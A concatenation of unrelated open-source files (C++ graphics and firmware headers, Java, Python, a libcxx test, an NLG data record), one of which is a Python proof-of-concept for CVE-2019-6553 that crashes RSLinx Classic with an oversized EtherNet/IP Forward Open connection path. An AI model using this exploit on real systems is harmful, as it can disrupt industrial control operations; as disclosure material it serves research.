(uint32 p = 0; p < pointCount; p++) { BPoint point; if (!read_coord(buffer, point.x) || !read_coord(buffer, point.y)) return false; BPoint pointIn; if (!read_coord(buffer, pointIn.x) || !read_coord(buffer, pointIn.y)) return false; BPoint pointOut; if (!read_coord(buffer, pointOut.x) || !read_coord(buffer, pointOut.y)) return false; if (!path->AddPoint(point, pointIn, pointOut, false)) return false; } return true; } // read_path_with_commands static bool read_path_with_commands(LittleEndianBuffer& buffer, VectorPath* path, uint8 pointCount) { PathCommandQueue queue; return queue.Read(buffer, path, pointCount); } // _ParsePaths status_t FlatIconImporter::_ParsePaths(LittleEndianBuffer& buffer, PathContainer* paths) { uint8 pathCount; if (!buffer.Read(pathCount)) return B_ERROR; for (int32 i = 0; i < pathCount; i++) { uint8 pathFlags; uint8 pointCount; if (!buffer.Read(pathFlags) || !buffer.Read(pointCount)) return B_ERROR; VectorPath* path = new (nothrow) VectorPath(); if (!path) return B_NO_MEMORY; // chose path reading strategy depending on path flags bool error = false; if (pathFlags & PATH_FLAG_NO_CURVES) { if (!read_path_no_curves(buffer, path, pointCount)) error = true; } else if (pathFlags & PATH_FLAG_USES_COMMANDS) { if (!read_path_with_commands(buffer, path, pointCount)) error = true; } else { if (!read_path_curves(buffer, path, pointCount)) error = true; } if (error) { delete path; return B_ERROR; } // post process path to clean it up path->CleanUp(); if (pathFlags & PATH_FLAG_CLOSED) path->SetClosed(true); // add path to container if (!paths->AddPath(path)) { delete path; return B_NO_MEMORY; } } return B_OK; } // _ReadTransformer static Transformer* _ReadTransformer(LittleEndianBuffer& buffer, VertexSource& source) { uint8 transformerType; if (!buffer.Read(transformerType)) return NULL; switch (transformerType) { case TRANSFORMER_TYPE_AFFINE: { AffineTransformer* affine = new (nothrow) AffineTransformer(source); if (!affine) return NULL; double matrix[6]; for (int32 i = 0; i < 6; i++) { float value; if (!buffer.Read(value)) { delete affine; return NULL; } matrix[i] = value; } affine->load_from(matrix); return affine; } case TRANSFORMER_TYPE_CONTOUR: { ContourTransformer* contour = new (nothrow) ContourTransformer(source); uint8 width; uint8 lineJoin; uint8 miterLimit; if (!contour || !buffer.Read(width) || !buffer.Read(lineJoin) || !buffer.Read(miterLimit)) { delete contour; return NULL; } contour->width(width - 128.0); contour->line_join((agg::line_join_e)lineJoin); contour->miter_limit(miterLimit); return contour; } case TRANSFORMER_TYPE_PERSPECTIVE: { PerspectiveTransformer* perspective = new (nothrow) PerspectiveTransformer(source); // TODO: upgrade AGG to be able to support storage of // trans_perspective return perspective; } case TRANSFORMER_TYPE_STROKE: { StrokeTransformer* stroke = new (nothrow) StrokeTransformer(source); uint8 width; uint8 lineOptions; uint8 miterLimit; // uint8 shorten; if (!stroke || !buffer.Read(width) || !buffer.Read(lineOptions) || !buffer.Read(miterLimit)) { delete stroke; return NULL; } stroke->width(width - 128.0); uint8 lineJoin = lineOptions & 15; stroke->line_join((agg::line_join_e)lineJoin); uint8 lineCap = lineOptions >> 4; stroke->line_cap((agg::line_cap_e)lineCap); stroke->miter_limit(miterLimit); return stroke; } default: { // unkown transformer, skip tag uint16 tagLength; if (!buffer.Read(tagLength)) return NULL; buffer.Skip(tagLength); return NULL; } } } // _ReadPathSourceShape Shape* FlatIconImporter::_ReadPathSourceShape(LittleEndianBuffer& buffer, StyleContainer* styles, PathContainer* paths) { // find out which style this shape uses uint8 styleIndex; uint8 pathCount; if (!buffer.Read(styleIndex) || !buffer.Read(pathCount)) return NULL; #ifdef ICON_O_MATIC Style* style = styles->StyleAt(StyleIndexFor(styleIndex)); #else Style* style = styles->StyleAt(styleIndex); #endif if (!style) { printf("_ReadPathSourceShape() - " "shape references non-existing style %d\n", styleIndex); return NULL; } // create the shape Shape* shape = new (nothrow) Shape(style); ObjectDeleter<Shape> shapeDeleter(shape); if (!shape || shape->InitCheck() < B_OK) return NULL; // find out which paths this shape uses for (uint32 i = 0; i < pathCount; i++) { uint8 pathIndex; if (!buffer.Read(pathIndex)) return NULL; #ifdef ICON_O_MATIC VectorPath* path = paths->PathAt(PathIndexFor(pathIndex)); #else VectorPath* path = paths->PathAt(pathIndex); #endif if (!path) { printf("_ReadPathSourceShape() - " "shape references non-existing path %d\n", pathIndex); continue; } shape->Paths()->AddPath(path); } // shape flags uint8 shapeFlags; if (!buffer.Read(shapeFlags)) return NULL; shape->SetHinting(shapeFlags & SHAPE_FLAG_HINTING); if (shapeFlags & SHAPE_FLAG_TRANSFORM) { // transformation if (!_ReadTransformable(buffer, shape)) return NULL; } else if (shapeFlags & SHAPE_FLAG_TRANSLATION) { // translation if (!_ReadTranslation(buffer, shape)) return NULL; } if (shapeFlags & SHAPE_FLAG_LOD_SCALE) { // min max visibility scale uint8 minScale; uint8 maxScale; if (!buffer.Read(minScale) || !buffer.Read(maxScale)) return NULL; shape->SetMinVisibilityScale(minScale / 63.75); shape->SetMaxVisibilityScale(maxScale / 63.75); } // transformers if (shapeFlags & SHAPE_FLAG_HAS_TRANSFORMERS) { uint8 transformerCount; if (!buffer.Read(transformerCount)) return NULL; for (uint32 i = 0; i < transformerCount; i++) { Transformer* transformer = _ReadTransformer(buffer, shape->VertexSource()); if (transformer && !shape->AddTransformer(transformer)) { delete transformer; return NULL; } } } shapeDeleter.Detach(); return shape; } // _ParseShapes status_t FlatIconImporter::_ParseShapes(LittleEndianBuffer& buffer, StyleContainer* styles, PathContainer* paths, ShapeContainer* shapes) { uint8 shapeCount; if (!buffer.Read(shapeCount)) return B_ERROR; for (uint32 i = 0; i < shapeCount; i++) { uint8 shapeType; if (!buffer.Read(shapeType)) return B_ERROR; Shape* shape = NULL; if (shapeType == SHAPE_TYPE_PATH_SOURCE) { // path source shape shape = _ReadPathSourceShape(buffer, styles, paths); if (!shape) return B_NO_MEMORY; } else { // unkown shape type, skip tag uint16 tagLength; if (!buffer.Read(tagLength)) return B_ERROR; buffer.Skip(tagLength); continue; } // add shape if we were able to read one if (shape && !shapes->AddShape(shape)) { delete shape; return B_NO_MEMORY; } } return B_OK; }
5,919
2,757
/*++ Copyright (c) 2004 - 2007, Intel Corporation. All rights reserved.<BR> This program and the accompanying materials are licensed and made available under the terms and conditions of the BSD License which accompanies this distribution. The full text of the license may be found at http://opensource.org/licenses/bsd-license.php THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED. Module Name: EdkIIGlueDefinitionChangesPeim.h Abstract: Data structure definition changes from EDK to EDKII --*/ #ifndef __EDKII_GLUE_DEFINITION_CHANGES_PEIM_H__ #define __EDKII_GLUE_DEFINITION_CHANGES_PEIM_H__ #if (EFI_SPECIFICATION_VERSION >= 0x0002000A) #include "TianoHii.h" #else #include "EfiInternalFormRepresentation.h" #endif #include "EdkIIGlueDefinitionChangesBase.h" #include "EfiPciCfg.h" // // typedef Edk types - EdkII types // typedef EFI_MEMORY_ARRAY_START_ADDRESS EFI_MEMORY_ARRAY_START_ADDRESS_DATA; typedef EFI_MEMORY_DEVICE_START_ADDRESS EFI_MEMORY_DEVICE_START_ADDRESS_DATA; typedef EFI_MISC_LAST_PCI_BUS EFI_MISC_LAST_PCI_BUS_DATA; typedef EFI_MISC_BIOS_VENDOR EFI_MISC_BIOS_VENDOR_DATA; typedef EFI_MISC_SYSTEM_MANUFACTURER EFI_MISC_SYSTEM_MANUFACTURER_DATA; typedef EFI_MISC_BASE_BOARD_MANUFACTURER EFI_MISC_BASE_BOARD_MANUFACTURER_DATA; typedef EFI_MISC_CHASSIS_MANUFACTURER EFI_MISC_CHASSIS_MANUFACTURER_DATA; typedef EFI_MISC_PORT_INTERNAL_CONNECTOR_DESIGNATOR EFI_MISC_PORT_INTERNAL_CONNECTOR_DESIGNATOR_DATA; typedef EFI_MISC_SYSTEM_SLOT_DESIGNATION EFI_MISC_SYSTEM_SLOT_DESIGNATION_DATA; typedef EFI_MISC_ONBOARD_DEVICE EFI_MISC_ONBOARD_DEVICE_DATA; typedef EFI_MISC_ONBOARD_DEVICE_TYPE_DATA EFI_MISC_PORTING_DEVICE_TYPE_DATA; typedef EFI_MISC_OEM_STRING EFI_MISC_OEM_STRING_DATA; typedef EFI_MISC_SYSTEM_OPTION_STRING EFI_MISC_SYSTEM_OPTION_STRING_DATA; typedef EFI_MISC_NUMBER_OF_INSTALLABLE_LANGUAGES EFI_MISC_NUMBER_OF_INSTALLABLE_LANGUAGES_DATA; typedef EFI_MISC_SYSTEM_LANGUAGE_STRING EFI_MISC_SYSTEM_LANGUAGE_STRING_DATA; typedef EFI_MISC_BIS_ENTRY_POINT EFI_MISC_BIS_ENTRY_POINT_DATA; typedef EFI_MISC_BOOT_INFORMATION_STATUS EFI_MISC_BOOT_INFORMATION_STATUS_DATA; typedef EFI_MISC_SYSTEM_POWER_SUPPLY EFI_MISC_SYSTEM_POWER_SUPPLY_DATA ; typedef EFI_MISC_SMBIOS_STRUCT_ENCAPSULATION EFI_MISC_SMBIOS_STRUCT_ENCAPSULATION_DATA; // ------------------- // EdkII Names - Edk Names // ------------------- #define gEfiPeiCpuIoPpiInServiceTableGuid gPeiCpuIoPpiInServiceTableGuid #define gEfiEndOfPeiSignalPpiGuid gEndOfPeiSignalPpiGuid #define gEfiPeiFvFileLoaderPpiGuid gPeiFvFileLoaderPpiGuid #define gEfiPeiMasterBootModePpiGuid gPeiMasterBootModePpiGuid #define gEfiPeiMemoryDiscoveredPpiGuid gPeiMemoryDiscoveredPpiGuid #define gEfiPciCfgPpiInServiceTableGuid gPeiPciCfgPpiInServiceTableGuid #define gEfiPeiReadOnlyVariablePpiGuid gPeiReadOnlyVariablePpiGuid #define gEfiPeiRecoveryModulePpiGuid gPeiRecoveryModulePpiGuid #define gEfiPeiResetPpiGuid gPeiResetPpiGuid #define gEfiPeiS3ResumePpiGuid gPeiS3ResumePpiGuid #define gEfiPeiSectionExtractionPpiGuid gPeiSectionExtractionPpiGuid #define gEfiPeiSecurityPpiGuid gPeiSecurityPpiGuid #define gEfiPeiStatusCodePpiGuid gPeiStatusCodePpiGuid #define gEfiPeiBootScriptExecuterPpiGuid gPeiBootScriptExecuterPpiGuid #define gEfiPeiSmbusPpiGuid gPeiSmbusPpiGuid #define gEfiPeiBlockIoPpiGuid gPeiBlockIoPpiGuid #define gEfiPeiDeviceRecoveryModulePpiGuid gPeiDeviceRecoveryModulePpiGuid #define gEfiPeiStallPpiGuid gPeiStallPpiGuid #define gEfiPeiPciCfgPpiInServiceTableGuid gPeiPciCfgPpiInServiceTableGuid #define gEfiPeiAtaControllerPpiGuid gPeiAtaControllerPpiGuid #define EFI_PEI_CPU_IO_PPI_INSTALLED_GUID PEI_CPU_IO_PPI_GUID #define EFI_PEI_RESET_PPI_GUID PEI_RESET_PPI_GUID #define EFI_PEI_PCI_CFG_PPI_INSTALLED_GUID PEI_PCI_CFG_PPI_GUID #define EFI_PEI_REPORT_PROGRESS_CODE_PPI_GUID PEI_STATUS_CODE_PPI_GUID #define EFI_PEI_BOOT_IN_RECOVERY_MODE_PEIM_PPI PEI_BOOT_IN_RECOVERY_MODE_PEIM_PPI #define EFI_PEI_END_OF_PEI_PHASE_PPI_GUID PEI_END_OF_PEI_PHASE_PPI_GUID #define EFI_PEI_MASTER_BOOT_MODE_PEIM_PPI PEI_MASTER_BOOT_MODE_PEIM_PPI #define EFI_PEI_PERMANENT_MEMORY_INSTALLED_PPI_GUID PEI_PERMANENT_MEMORY_INSTALLED_PPI_GUID #define EFI_PEI_READ_ONLY_VARIABLE_ACCESS_PPI_GUID PEI_READ_ONLY_VARIABLE_ACCESS_PPI_GUID #define EFI_PEI_RECOVERY_MODULE_PPI_GUID PEI_RECOVERY_MODULE_INTERFACE_PPI #define EFI_PEI_S3_RESUME_PPI_GUID PEI_S3_RESUME_PPI_GUID #define EFI_PEI_SECURITY_PPI_GUID PEI_SECURITY_PPI_GUID #define EFI_PEI_STALL_PPI_GUID PEI_STALL_PPI_GUID #define EFI_PEI_SMBUS_PPI_GUID PEI_SMBUS_PPI_GUID #define EFI_PEI_BOOT_SCRIPT_EXECUTER_PPI_GUID PEI_BOOT_SCRIPT_EXECUTER_PPI_GUID #define EFI_PEI_FIND_FV_PPI_GUID EFI_FIND_FV_PPI_GUID #define EFI_PEI_VIRTUAL_BLOCK_IO_PPI PEI_BLOCK_IO_PPI_GUID #define EFI_PEI_DEVICE_RECOVERY_MODULE_PPI_GUID PEI_DEVICE_RECOVERY_MODULE_INTERFACE_PPI // // typedef Edk types - EdkII types // typedef PEI_RECOVERY_MODULE_INTERFACE EFI_PEI_RECOVERY_MODULE_PPI; typedef PEI_STALL_PPI EFI_PEI_STALL_PPI; typedef PEI_SMBUS_PPI EFI_PEI_SMBUS_PPI; typedef PEI_READ_ONLY_VARIABLE_PPI EFI_PEI_READ_ONLY_VARIABLE_PPI; typedef PEI_PCI_CFG_PPI EFI_PEI_PCI_CFG_PPI; typedef PEI_STATUS_CODE_PPI EFI_PEI_PROGRESS_CODE_PPI; typedef PEI_CPU_IO_PPI_WIDTH EFI_PEI_CPU_IO_PPI_WIDTH; typedef PEI_CPU_IO_PPI_IO_MEM EFI_PEI_CPU_IO_PPI_IO_MEM; typedef PEI_CPU_IO_PPI_ACCESS EFI_PEI_CPU_IO_PPI_ACCESS; typedef PEI_CPU_IO_PPI_IO_READ8 EFI_PEI_CPU_IO_PPI_IO_READ8; typedef PEI_CPU_IO_PPI_IO_READ16 EFI_PEI_CPU_IO_PPI_IO_READ16; typedef PEI_CPU_IO_PPI_IO_READ32 EFI_PEI_CPU_IO_PPI_IO_READ32; typedef PEI_CPU_IO_PPI_IO_READ64 EFI_PEI_CPU_IO_PPI_IO_READ64; typedef PEI_CPU_IO_PPI_IO_WRITE8 EFI_PEI_CPU_IO_PPI_IO_WRITE8; typedef PEI_CPU_IO_PPI_IO_WRITE16 EFI_PEI_CPU_IO_PPI_IO_WRITE16; typedef PEI_CPU_IO_PPI_IO_WRITE32 EFI_PEI_CPU_IO_PPI_IO_WRITE32; typedef PEI_CPU_IO_PPI_IO_WRITE64 EFI_PEI_CPU_IO_PPI_IO_WRITE64; typedef PEI_CPU_IO_PPI_MEM_READ8 EFI_PEI_CPU_IO_PPI_MEM_READ8; typedef PEI_CPU_IO_PPI_MEM_READ16 EFI_PEI_CPU_IO_PPI_MEM_READ16; typedef PEI_CPU_IO_PPI_MEM_READ32 EFI_PEI_CPU_IO_PPI_MEM_READ32; typedef PEI_CPU_IO_PPI_MEM_READ64 EFI_PEI_CPU_IO_PPI_MEM_READ64; typedef PEI_CPU_IO_PPI_MEM_WRITE8 EFI_PEI_CPU_IO_PPI_MEM_WRITE8; typedef PEI_CPU_IO_PPI_MEM_WRITE16 EFI_PEI_CPU_IO_PPI_MEM_WRITE16; typedef PEI_CPU_IO_PPI_MEM_WRITE32 EFI_PEI_CPU_IO_PPI_MEM_WRITE32; typedef PEI_CPU_IO_PPI_MEM_WRITE64 EFI_PEI_CPU_IO_PPI_MEM_WRITE64; typedef PEI_GET_VARIABLE EFI_PEI_GET_VARIABLE; typedef PEI_GET_NEXT_VARIABLE_NAME EFI_PEI_GET_NEXT_VARIABLE_NAME; typedef PEI_LOAD_RECOVERY_CAPSULE EFI_PEI_LOAD_RECOVERY_CAPSULE; typedef PEI_RESET_PPI EFI_PEI_RESET_PPI; typedef PEI_S3_RESUME_PPI EFI_PEI_S3_RESUME_PPI; typedef PEI_S3_RESUME_PPI_RESTORE_CONFIG EFI_PEI_S3_RESUME_PPI_RESTORE_CONFIG; typedef SEC_PLATFORM_INFORMATION EFI_SEC_PLATFORM_INFORMATION; typedef PEI_SECURITY_PPI EFI_PEI_SECURITY_PPI; typedef PEI_SECURITY_AUTHENTICATION_STATE EFI_PEI_SECURITY_AUTHENTICATION_STATE; typedef PEI_STALL EFI_PEI_STALL; typedef PEI_SMBUS_PPI_EXECUTE_OPERATION EFI_PEI_SMBUS_PPI_EXECUTE_OPERATION; typedef PEI_SMBUS_NOTIFY_FUNCTION EFI_PEI_SMBUS_NOTIFY_FUNCTION; typedef PEI_SMBUS_PPI_ARP_DEVICE EFI_PEI_SMBUS_PPI_ARP_DEVICE; typedef PEI_SMBUS_PPI_GET_ARP_MAP EFI_PEI_SMBUS_PPI_GET_ARP_MAP; typedef PEI_SMBUS_PPI_NOTIFY EFI_PEI_SMBUS_PPI_NOTIFY; typedef PEI_BOOT_SCRIPT_EXECUTE EFI_PEI_BOOT_SCRIPT_EXECUTE; typedef PEI_BOOT_SCRIPT_EXECUTER_PPI EFI_PEI_BOOT_SCRIPT_EXECUTER_PPI; typedef EFI_FIND_FV_FINDFV EFI_PEI_FIND_FV_FINDFV; typedef EFI_FIND_FV_PPI EFI_PEI_FIND_FV_PPI; typedef PEI_RECOVERY_BLOCK_IO_INTERFACE EFI_PEI_RECOVERY_BLOCK_IO_PPI; typedef PEI_LBA EFI_PEI_LBA; typedef PEI_BLOCK_IO_MEDIA EFI_PEI_BLOCK_IO_MEDIA; typedef PEI_BLOCK_DEVICE_TYPE EFI_PEI_BLOCK_DEVICE_TYPE; typedef PEI_GET_NUMBER_BLOCK_DEVICES EFI_PEI_GET_NUMBER_BLOCK_DEVICES; typedef PEI_GET_DEVICE_MEDIA_INFORMATION EFI_PEI_GET_DEVICE_MEDIA_INFORMATION; typedef PEI_READ_BLOCKS EFI_PEI_READ_BLOCKS; typedef PEI_DEVICE_RECOVERY_MODULE_INTERFACE EFI_PEI_DEVICE_RECOVERY_MODULE_PPI; typedef PEI_DEVICE_GET_NUMBER_RECOVERY_CAPSULE EFI_PEI_DEVICE_GET_NUMBER_RECOVERY_CAPSULE; typedef PEI_DEVICE_GET_RECOVERY_CAPSULE_INFO EFI_PEI_DEVICE_GET_RECOVERY_CAPSULE_INFO; typedef PEI_DEVICE_LOAD_RECOVERY_CAPSULE EFI_PEI_DEVICE_LOAD_RECOVERY_CAPSULE; #endif
6,954
738
public class FactoryTest { public static void main(String[] args) { Product pencil = ProductFactory.getProduct("Pencil"); pencil.sell(); // sell Pencil !!! Product note = ProductFactory.getProduct("Note"); note.sell(); // sell Note !!! } } interface Product { public void sell(); } class Pencil implements Product { @Override public void sell() { System.out.println("sell Pencil !!!"); } } class Note implements Product { @Override public void sell() { System.out.println("sell Note !!!"); } } class ProductFactory { public static Product getProduct(String className) { Product p = null; switch (className) { case "Pencil": p = new Pencil(); break; case "Note": p = new Note(); break; } return p; } }
337
796
<reponame>donroyco/falco<filename>backend/core/management/commands/rundebugserver.py import os from django.contrib.staticfiles.management.commands import runserver class Command(runserver.Command): def handle(self, *args, **options): # Try to enable vscode debugger try: import ptvsd # We only run the ptvsd server once, on PID 1 # Otherwise django attempts to start the server on every refresh. if os.getpid() != 1 and not ptvsd.is_attached(): ptvsd.enable_attach(address=("0.0.0.0", 9000), redirect_output=True) print("🖥 Remote debugger running.") except (ImportError, OSError) as e: print("⚠️ Couldn't start remote debugger:", e) super(Command, self).handle(*args, **options)
343
2,338
<reponame>mkinsner/llvm<filename>libcxx/test/std/containers/sequences/array/array.tuple/get.pass.cpp //===----------------------------------------------------------------------===// // // Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions. // See https://llvm.org/LICENSE.txt for license information. // SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception // //===----------------------------------------------------------------------===// // <array> // template <size_t I, class T, size_t N> T& get(array<T, N>& a); #include <array> #include <cassert> #include "test_macros.h" template <typename ...T> TEST_CONSTEXPR std::array<int, sizeof...(T)> tempArray(T ...args) { return {args...}; } TEST_CONSTEXPR_CXX14 bool tests() { { std::array<double, 1> array = {3.3}; assert(std::get<0>(array) == 3.3); std::get<0>(array) = 99.1; assert(std::get<0>(array) == 99.1); } { std::array<double, 2> array = {3.3, 4.4}; assert(std::get<0>(array) == 3.3); assert(std::get<1>(array) == 4.4); std::get<0>(array) = 99.1; std::get<1>(array) = 99.2; assert(std::get<0>(array) == 99.1); assert(std::get<1>(array) == 99.2); } { std::array<double, 3> array = {3.3, 4.4, 5.5}; assert(std::get<0>(array) == 3.3); assert(std::get<1>(array) == 4.4); assert(std::get<2>(array) == 5.5); std::get<1>(array) = 99.2; assert(std::get<0>(array) == 3.3); assert(std::get<1>(array) == 99.2); assert(std::get<2>(array) == 5.5); } { std::array<double, 1> array = {3.3}; static_assert(std::is_same<double&, decltype(std::get<0>(array))>::value, ""); } { assert(std::get<0>(tempArray(1, 2, 3)) == 1); assert(std::get<1>(tempArray(1, 2, 3)) == 2); assert(std::get<2>(tempArray(1, 2, 3)) == 3); } return true; } int main(int, char**) { tests(); #if TEST_STD_VER >= 14 static_assert(tests(), ""); #endif return 0; }
950
303
/* * 42TinyJS * * A fork of TinyJS with the goal to makes a more JavaScript/ECMA compliant engine * * Authored By <NAME> <<EMAIL>> * * Copyright (C) 2010-2015 ardisoft * * * Permission is hereby granted, free of charge, to any person obtaining a copy of * this software and associated documentation files (the "Software"), to deal in * the Software without restriction, including without limitation the rights to * use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies * of the Software, and to permit persons to whom the Software is furnished to do * so, subject to the following conditions: * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. */ #ifndef pool_allocator_h__ #define pool_allocator_h__ #include <typeinfo> #include <stdint.h> #include <string> #include "config.h" #ifndef NO_THREADING # if SPINLOCK_IN_POOL_ALLOCATOR # include <atomic> # else # include "TinyJS_Threading.h" # endif #endif /************************************************************************ * TinyJS must many many times allocates and frees objects * To prevent memory fragmentation and speed ups allocates & frees, i have * added to 42TinyJS a pool_allocator. This allocator allocates every 64 objects * as a pool of objects. Is an object needed it can faster allocated from this pool as * from the heap. ************************************************************************/ #if !defined(DEBUG_POOL_ALLOCATOR) && (defined(_DEBUG) || defined(LOG_POOL_ALLOCATOR_MEMORY_USAGE)) # define DEBUG_POOL_ALLOCATOR #endif struct block_head; class fixed_size_allocator { public: ~fixed_size_allocator(); static void *alloc(size_t,const char* for_class=0); static void free(void *, size_t); size_t objectSize() { return object_size; } #ifndef NO_THREADING # if SPINLOCK_IN_POOL_ALLOCATOR static std::atomic_flag locker; # else static CScriptMutex locker; # endif #endif private: fixed_size_allocator(size_t num_objects, size_t object_size, const char* for_class); fixed_size_allocator(const fixed_size_allocator&); fixed_size_allocator& operator=(const fixed_size_allocator&); void *_alloc(size_t); bool _free(void* p, size_t); size_t num_objects; size_t object_size; void *head_of_free_list; block_head *head; int refs; #ifdef DEBUG_POOL_ALLOCATOR // Debug std::string name; int allocs; int frees; int current; int max; int blocks; #endif }; //************************************************************************************** template<typename T, int num_objects=64> class fixed_size_object { public: static void* operator new(size_t size) { #ifdef DEBUG_POOL_ALLOCATOR return fixed_size_allocator::alloc(size, typeid(T).name()); #else return fixed_size_allocator::alloc(size); #endif } static void* operator new(size_t size, void* p) { return p; } static void operator delete(void* p, size_t size) { fixed_size_allocator::free(p, size); } private: }; #if 0 // under construction template<typename T> class block_allocator_stl { public : // typedefs typedef T value_type; typedef value_type* pointer; typedef const value_type* const_pointer; typedef value_type& reference; typedef const value_type& const_reference; typedef std::size_t size_type; typedef std::ptrdiff_t difference_type; public : // convert an allocator<T> to allocator<U> template<typename U> struct rebind { typedef block_allocator_stl<U> other; }; inline explicit block_allocator_stl() {} inline ~block_allocator_stl() {} inline block_allocator_stl(block_allocator_stl const&) {} template<typename U> inline block_allocator_stl(block_allocator_stl<U> const&) {} inline block_allocator_stl<T> &operator=(block_allocator_stl<T> const&) {} template<typename U> inline block_allocator_stl<T> &operator=(block_allocator_stl<U> const&) {} // address inline pointer address(reference r) { return &r; } inline const_pointer address(const_reference r) { return &r; } // memory allocation inline pointer allocate(size_type cnt, const void*) { return reinterpret_cast<pointer>(fixed_size_allocator::get(cnt * sizeof (T), true, typeid(T).name())->alloc(cnt * sizeof (T))); // return reinterpret_cast<pointer>(::operator new(cnt * sizeof (T))); } inline void deallocate(pointer p, size_type cnt) { fixed_size_allocator::get(cnt * sizeof (T), false)->free(p, cnt * sizeof (T)); // ::operator delete(p); } // size inline size_type max_size() const { return SIZE_MAX / sizeof(T); } inline void construct(pointer _Ptr, value_type& _Val) { ::new ((void*)_Ptr) value_type(_Val); } inline void destroy(pointer _Ptr) { _Ptr->~value_type(); } }; #endif #endif // pool_allocator_h__
1,763
1,007
## # Exploit Title: RSLinx Classic - stack overflow # Date: 06/11/2019 # Exploit Author: <NAME> # CVE : CVE-2019-6553 # Advisory: https://www.tenable.com/security/research/tra-2019-11 # Affected Vendors/Device/Firmware: # - RSLinx Classic 4.10.00 and earlier ## import sys, socket, binascii from struct import * def usage(): print "usage : "+sys.argv[0] + " <target_ip> <target_port>" print "example: "+sys.argv[0] + " 192.168.1.123 44818" def mk_msg(cmd, dlen=None,session=0, status=0, sender='\x00'*8, options=0, data=''): if dlen is None: dlen = len(data) return pack('<HHLL8sL', cmd, dlen, session, status, sender, options) + data def mk_type(id, size=None, data=''): if size is None: size = len(data) return pack('<HH', id, size) + data if len(sys.argv) != 3: usage() sys.exit() host = str(sys.argv[1]) port = int(sys.argv[2]) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((host, port)) # Register Session msg = mk_msg(cmd=0x65,data=pack('<HH',1,0)) s.send(msg) res = s.recv(1024) print binascii.hexlify(res) cmd, dlen, session, status, sender, options = unpack('<HHLL8sL',res[0:24]) if(cmd != 0x65 or status != 0): print 'RegisterSession command failed.' s.close(); sys.exit() b2 = '\x54' # service code: Forward Open # vulnerble function is also reachable via # other services (i.e., 0x52, 0x53, etc.) b2 += '\x02' # 2 req path segments b2 += '\x20\x06' # class: Connection Manager b2 += '\x24\x01' # Instance 1 b2 += '\x00' # priority/tick_time b2 += '\xf9' # timeout ticks b2 += pack('<L',0x80000031) # O -> T network connection id b2 += pack('<L',0x80fe0030) # T -> O network connection id b2 += pack('<H',0x1337) # connection serial number b2 += pack('<H',0x1234) # vendor id b2 += pack('<L',0xdeadbeef) # originator serialnumber b2 += '\x00' # connection timeout multiplier b2 += '\x00\x00\x00' # reserved b2 += pack('<L',0x007a1200) # O -> T RPI b2 += pack('<H',0x0001) # O -> T connection param b2 += pack('<L',0x007a1200) # T -> O RPI b2 += pack('<H',0x0001) # T -> O connection param b2 += '\xa3' # transport_type # Create a connection path cp = '\x01\x00' # Port Segment: port id 1, link addr 0x00 # Add a long Electronic Key Segment cp_max = 0xff * 2; eks_len = (cp_max - 6 - 2) / 2 eks = '\x34' + pack('<B',eks_len) + 'A' * eks_len * 2 cp += eks # Add Class and Instance logical segments cp += '\x20\x02\x24\x01' if (len(cp) % 2): cp += '\x00' cp_size = len(cp) / 2; b2 += pack('<B',cp_size) # connection path in wordsize b2 += cp # connection path data = pack('<L',0) # interface data += pack('<H',0) # timeout data += pack('<H',2) # number of items data += mk_type(0) # address item data += mk_type(id=0xb2, data=b2) # data item msg = mk_msg(cmd=0x6f,session=session,data=data) s.send(msg) # RSLINX.exe should die res = s.recv(1024) print binascii.hexlify(res)
1,434
442
#!/usr/bin/python # -*- coding: utf-8 -*- """ Examples for Python-nvd3 is a Python wrapper for NVD3 graph library. NVD3 is an attempt to build re-usable charts and chart components for d3.js without taking away the power that d3.js gives you. Project location : https://github.com/areski/python-nvd3 """ from nvd3 import lineWithFocusChart import random import datetime import time start_time = int(time.mktime(datetime.datetime(2012, 6, 1).timetuple()) * 1000) nb_element = 100 # Open File for test output_file = open('test_lineWithFocusChart.html', 'w') # --------------------------------------- type = "lineWithFocusChart" chart = lineWithFocusChart(name=type, height=550, width=850, color_category='category20b', x_is_date=True, x_axis_format="%d %b %Y %H", focus_enable=True) chart.set_containerheader("\n\n<h2>" + type + "</h2>\n\n") xdata = list(range(nb_element)) xdata = [start_time + x * 1000000000 for x in xdata] ydata = [i + random.randint(-10, 10) for i in range(nb_element)] ydata2 = [x * 2 for x in ydata] ydata3 = [x * 3 for x in ydata] ydata4 = [x * 4 for x in ydata] extra_serie = {"tooltip": {"y_start": "There is ", "y_end": " calls"}, "date_format": "%d %b %Y %H:%M:%S %p"} # extra_serie = None chart.add_serie(name="serie 1", y=ydata, x=xdata, extra=extra_serie) chart.add_serie(name="serie 2", y=ydata2, x=xdata, extra=extra_serie) chart.add_serie(name="serie 3", y=ydata3, x=xdata, extra=extra_serie) chart.add_serie(name="serie 4", y=ydata4, x=xdata, extra=extra_serie) chart.buildhtml() output_file.write(chart.htmlcontent) # close Html file output_file.close()
675
3,380
{ "validation": [ { "gem_id": "e2e_nlg-validation-110", "meaning_representation": "name[Aromi], eatType[coffee shop], food[Chinese], customer rating[1 out of 5], area[riverside]", "references": [ "There is an Chinese coffee shop named Aromi near the riverside that has 1 out of 5 in the customer ranking and friendly with kid" ], "target": "There is an Chinese coffee shop named Aromi near the riverside that has 1 out of 5 in the customer ranking and friendly with kid" } ] }
237
496
